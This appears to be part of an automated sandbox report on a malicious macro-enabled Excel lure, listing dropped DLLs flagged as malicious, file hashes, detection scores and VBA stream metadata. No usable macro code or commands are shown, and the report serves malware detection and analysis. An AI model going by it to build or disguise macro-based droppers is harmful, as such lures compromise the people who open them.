      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):4.528531099414568
      Encrypted:false
      SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2M6:vs6Xpq0H3Jhds/9+qC/zfTPLo
      MD5:2B6A4F376AFCF41EAA504F31C09742EA
      SHA1:1689F9D6E949AC730E315CFFEFBB6300C3CCA262
      SHA-256:5302838FB3AD0C5EA363196FB161ECA41E392884E96590E7C231EDB2AE7B1EB7
      SHA-512:E14E146CD877D60BAEFD736F05616D54109FA3EA251DA8F1C8B55572A223B2328941233FCAD93DB9BF407F46D36223FF659FC27FD8BFC19EE5FEC66D84E6CB16
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):162688
      Entropy (8bit):4.254419985994617
      Encrypted:false
      SSDEEP:1536:C6nL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:COJNSc83tKBAvQVCgOtmXmLpLm4l
      MD5:D0799DC754C6B53DA9AC3EDFEAE7C497
      SHA1:321489150A4B3693E72095F28AFC950CDA93F4B2
      SHA-256:785F37AF2F42EA4741A00241CFAC64D6C71E92BE7475927AE1F43CC18AE2D320
      SHA-512:7815A1C0595E681810333338B145A20316DD7169BC04FFFC3357C270770833654201BA9719434CAB8894954F141989C7AD6320D73EAD464C57BA509CC8678BE3
      Malicious:false
      Reputation:unknown
      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
      C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):15676
      Entropy (8bit):4.533431190778817
      Encrypted:false
      SSDEEP:192:9xlA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:938xesT20lheZ3waE5D7qxIxkxe
      MD5:93CDEC060A1F425C0D71BA179C046574
      SHA1:9CD4CBCA6FD883B4E96A72726EF3BCB216E8661F
      SHA-256:17E0F98101575FCB56EEA008FBBF1C61323F23E8F67F5F6F756706D35FA49F0C
      SHA-512:E1F8365EFB8081FA0E7FE11B5460DDF3D1B7E736976C418C4FA7E217B78160C41A6E24C0B5359BA395C175ED5FC52D2B21D369A48FF53878B9E94DB7EF368ECB
      Malicious:false
      Reputation:unknown
      Preview: MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... ..................*HW.A..A.`............E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......|...K..a...
      C:\Users\user\Drezd.red
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):1.6961804656486577
      Encrypted:false
      SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
      MD5:B19B0AF9A01DD936D091C291B19696C8
      SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
      SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
      SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 9%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\Drezd1.red
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):1.6961804656486577
      Encrypted:false
      SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
      MD5:B19B0AF9A01DD936D091C291B19696C8
      SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
      SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
      SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 9%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\Drezd2.red
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):1.6961804656486577
      Encrypted:false
      SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
      MD5:B19B0AF9A01DD936D091C291B19696C8
      SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
      SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
      SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 9%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Windows\System32\wbem\Performance\WmiApRpl_new.h
      Process:C:\Windows\System32\wbem\WMIADAP.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):3444
      Entropy (8bit):5.011954215267298
      Encrypted:false
      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
      MD5:B133A676D139032A27DE3D9619E70091
      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
      Malicious:false
      Reputation:unknown
      Preview: //////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
      C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
      Process:C:\Windows\System32\wbem\WMIADAP.exe
      File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
      Category:dropped
      Size (bytes):924
      Entropy (8bit):2.8598329685344623
      Encrypted:false
      SSDEEP:12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivG:Q3wU/IM1x6oG
      MD5:2667367F9339639AF825E7122CE3B2A3
      SHA1:56E33B464F9AD8D0A6AC3343A85D7618D590FEDC
      SHA-256:B2353629E198C2F5244BC75AD797789FFBCA2CED084D731084AF312AD6DCBE7F
      SHA-512:A214C16977CFD760929F76D33DBA89277C6BC7B5948ACFBD89D6AF4A688B9F421D3D2860E1CAE81436E05A52FFED92B04AA2ABBF70CE7231A053BD3E724F3EA9
      Malicious:false
      Reputation:unknown
      Preview: .././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.........
      C:\Windows\system32\wbem\Performance\WmiApRpl.hec (copy)
      Process:C:\Windows\System32\wbem\WMIADAP.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):3444
      Entropy (8bit):5.011954215267298
      Encrypted:false
      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
      MD5:B133A676D139032A27DE3D9619E70091
      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
      Malicious:false
      Reputation:unknown
      Preview: //////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Sep 27 10:38:52 2021, Security: 0
      Entropy (8bit):7.131904320218787
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:Compensation-2308017-09272021.xls
      File size:129024
      MD5:52b4fcf57e4fb524cf33503e8a5272ef
      SHA1:d5b80e8ceaa81361da9ff6d18a4927dfd3b47d1a
      SHA256:a5bc073043d0729f825df8302f425148ce8c65214a87094fe96fe9039ac7f088
      SHA512:b52f725aaaa4491efe3c1b91a42ac74ab856ae1edfc838100553ac529df82553e43eb876ff40e3b6e03a5b8d693839b45d6d1b77283d8c0efe7f4e88dc549e9a
      SSDEEP:3072:Cik3hOdsylKlgxopeiBNhZFGzE+cL2kdAnc6YehWfG+tUHKGDbpmsiizBti2JtqV:vk3hOdsylKlgxopeiBNhZF+E+W2kdAni
      File Content Preview:........................>.......................................................b..............................................................................................................................................................................

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "Compensation-2308017-09272021.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1251
      Author:Test
      Last Saved By:Test
      Create Time:2015-06-05 18:17:20
      Last Saved Time:2021-09-27 09:38:52
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1251
      Thumbnail Scaling Desired:False
      Company:
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:1048576

      Streams with VBA

      VBA File Name: UserForm2, Stream Size: -1
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2
      VBA File Name:UserForm2
      Stream Size:-1
      Data ASCII:
      Data Raw:
      VBA Code
      VBA File Name: Module5, Stream Size: 4241
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Module5
      VBA File Name:Module5
      Stream Size:4241
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 9c 0d 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: Sheet1, Stream Size: 991
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1
      Stream Size:991
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: ThisWorkbook, Stream Size: 2501
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook
      Stream Size:2501
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 82 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 89 04 00 00 a9 07 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: UserForm2, Stream Size: 1182
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
      VBA File Name:UserForm2
      Stream Size:1182
      Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      Streams

      Stream Path: \x1CompObj, File Type: data, Stream Size: 108
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:108
      Entropy:4.18849998853
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.65175227267
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:208
      Entropy:3.33231709703
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . 6 { . . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101831
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:101831
      Entropy:7.65479066874
      Base64 Encoded:True
      Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
      Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 662
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:662
      Entropy:5.27592988154
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
      Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37
      Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTlk
      File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
      Stream Size:30
      Entropy:1.37215976263
      Base64 Encoded:False
      Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
      Data Raw:01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:116
      Entropy:3.43722878834
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . . .
      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
      File Type:data
      Stream Size:97
      Entropy:3.61064918306
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
      File Type:ASCII text, with CRLF line terminators
      Stream Size:302
      Entropy:4.65399600072
      Base64 Encoded:True
